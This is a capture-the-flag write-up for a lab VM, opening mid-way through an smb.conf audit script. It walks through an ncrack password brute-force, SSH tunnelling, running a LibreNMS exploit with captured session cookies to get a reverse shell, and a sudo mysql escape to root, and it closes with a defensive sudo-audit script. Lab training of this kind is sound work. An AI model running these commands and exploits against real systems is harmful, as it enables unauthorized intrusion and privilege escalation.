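    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings = []
    # 'bad user' maps logons with unknown usernames to the guest account.
    if glob.get("maptoguest", "never").lower() != "never":
        findings.append(("global", "MAP_TO_GUEST"))
    # Guest usershares only matter when usershares are enabled (max > 0).
    if flag(glob, "usershareallowguests") and int(glob.get("usersharemaxshares", "0")) > 0:
        findings.append(("global", "GUEST_USERSHARES"))
    for share, opts in conf.items():
        if share == "global" or not flag(opts, "guestok", "public"):
            continue
        findings.append((share, "GUEST_SHARE"))
        if opts.get("path", "").startswith("/home/"):
            findings.append((share, "GUEST_SHARE_IN_HOME"))
        read_only = flag(opts, "readonly", default="yes")
        if not read_only or flag(opts, "writeable", "writable", "writeok"):
            findings.append((share, "GUEST_WRITABLE"))
    return findings


if __name__ == "__main__":
    for label, text in (("leaked", LEAKED_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit(text))
```
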

## Exploitation

### ncrack

```
ncrack -v -u aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.43.97
```

![](/files/-M7RfPTKy-oSJ5kdL4ta)

We can see the password for the user `aeolus` is `sergioteamo`

### ftp

After that, we can use `ftp` to log in:

```
ftp 192.168.43.97
```

![](/files/-M7Rf73GddNEtQtLJdzo)

Then I realized that we can use SSH to log in to the user account.

### ssh

```
ssh aeolus@192.168.43.97
```

![](/files/-M7RfhxFLUvx5zwrdNWB)

I had been looking through a lot of directories and couldn't seem to find a way. After looking at a walk-through, I found out that there is an `apache` directory.

Navigating to `/etc/apache`, we can find a few folders; I went into the `sites-enabled` folder and found a file called `librenms.conf`.

`cat` that file and we find this:

![](/files/-M7RgWc_r9PMkmTk592J)

We can see that there is a server running on localhost, port 8080.

We now need to forward that port over an SSH tunnel so that we can reach the service from our own machine.

### ssh tunneling

```
ssh -L 9000:localhost:8080 aeolus@192.168.43.97
```

![](/files/-M7RgwqhDTcbUQUs_X-2)

Then we can use our browser to browse the web-page.

![](/files/-M7RiFq0BdtRs1zxRjnk)

### Exploit

It is LibreNMS. I went to searchsploit, did a quick lookup, and got the exploit.

![](/files/-M7RiPjRPZtaWcJaDzPz)

After that, copy the exploit to a directory and set up the exploit

![](/files/-M7Ribq5M2kjWwi_ghUt)

The exploit actually requires the URL, cookies and remote host and port.

I used Burp Suite to intercept the traffic and get the cookies from it.

![](/files/-M7RiyrpE9s3Z1gyQFFN)

Before running the command, remember to set up a listener on our machine.

The command should look like this:

```
python 47044.py http://localhost:9000 "XSRF-TOKEN=eyJpdiI6InJXNnlUNWVmaDZxbVJDQ3JjY2tVZEE9PSIsInZhbHVlIjoidFh0VGhjditaNm9YNWxnaGgxVHIranBiZzBTTTlEYUgzckRiXC9KK0pBT2htXC9cL0FKVEVIYkNwUkZuTmNvK3R3cGdpbEFXeisyTUhqQVBtXC9nU0t5VHh3PT0iLCJtYWMiOiJjNTU1NjcxYzc3Y2Q3ZjBhYjU5NzBhZDA2ZGY0MmI5OWQ2Yzc5N2MyOTcxMWY4YjUzZWJlYzFiZDI3NTJhOWUxIn0%3D; librenms_session=eyJpdiI6IkY3bVU4d2lnSCtTdmlrRjJ1bjRSeUE9PSIsInZhbHVlIjoiSEsxOHhDXC91QytSSmcyMHBJdEkrcUlmSVlrR29VaGp2ckxqQ0I5d1poWlwvQk0rRTBNRnJjQVdWYU5SdENrb1J0Z2VTNnlFS0FQdHdYeUhoQzNvVTE0dz09IiwibWFjIjoiNDRjYTQ4ZDk5NTM2Y2FkNDI4NzAwNDhhMjg2MjRlMTk3MTMzNzIzM2Q2NDI4NjYyNjQ2NjcwZWJmZDcyN2E2YyJ9; PHPSESSID=2jmu3np8ppkk80uu94b620rnc5" 192.168.43.182 5555
```

![](/files/-M7Rkdv71b3jXxi3q7T0)

We successfully connected to the user `cronus`

![](/files/-M7RkqZ0He_G4xVNt8k7)

## Privilege Escalation

We first get a proper shell by typing:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

When we type `sudo -l`, it shows us this:

![](/files/-M7RlDx3GQpOdN826Alc)

Thanks to this [website](https://gtfobins.github.io/) that my senior sent to me, I managed to find a suitable command to get root from it:

```
sudo mysql -e '\! /bin/sh'
```

![](/files/-M7RleGfs02uCkCbe6pv)

Got root access!

![](/files/-M7Rll4MRmBoFp8jLmOM)
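From the defender's side, the root shell above comes from a sudo rule that lets `cronus` run `mysql` as root. This added example (not from the original write-up) audits `sudo -l` output for such rules. The sample output is constructed, since the page shows it only as a screenshot, and the `SHELL_CAPABLE` set is a short illustrative list, not a complete one.

```python
import os
import re

# Constructed sample of `sudo -l` output (assumption: the page shows the real
# output only as a screenshot). User and host names are taken from the page.
SAMPLE_SUDO_L = """\
User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
"""

# Programs that can start a shell from inside themselves. `mysql` is the one
# used on this page; the rest are illustrative and the list is not exhaustive.
SHELL_CAPABLE = {"mysql", "less", "more", "man", "vi", "vim", "find", "awk",
                 "perl", "python"}

# One rule line: "(runas[:group]) [TAG: ...] command[, command...]"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudo_l(output):
    """Return (runas_user, command, nopasswd, reason) for each risky rule.

    Commands are split on commas; escaped commas inside arguments are not
    handled in this example.
    """
    findings = []
    for line in output.splitlines():
        match = RULE.match(line)
        if not match:
            continue                      # header or Defaults line
        runas_user = match["runas"].split(":")[0].strip()
        nopasswd = "NOPASSWD:" in match["tags"]
        for cmd in (c.strip() for c in match["cmds"].split(",")):
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "unrestricted"   # any command may be run
            elif binary in SHELL_CAPABLE:
                reason = "shell-capable"  # program can spawn a shell itself
            else:
                continue
            findings.append((runas_user, cmd, nopasswd, reason))
    return findings


if __name__ == "__main__":
    for runas, cmd, nopasswd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        auth = "without a password" if nopasswd else "with a password"
        print(f"{cmd} runs as {runas} {auth}: {reason}")
```

A finding like this is resolved by removing the sudo rule and giving the account an unprivileged database login instead of root-level access to the client binary.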

Congratulations!


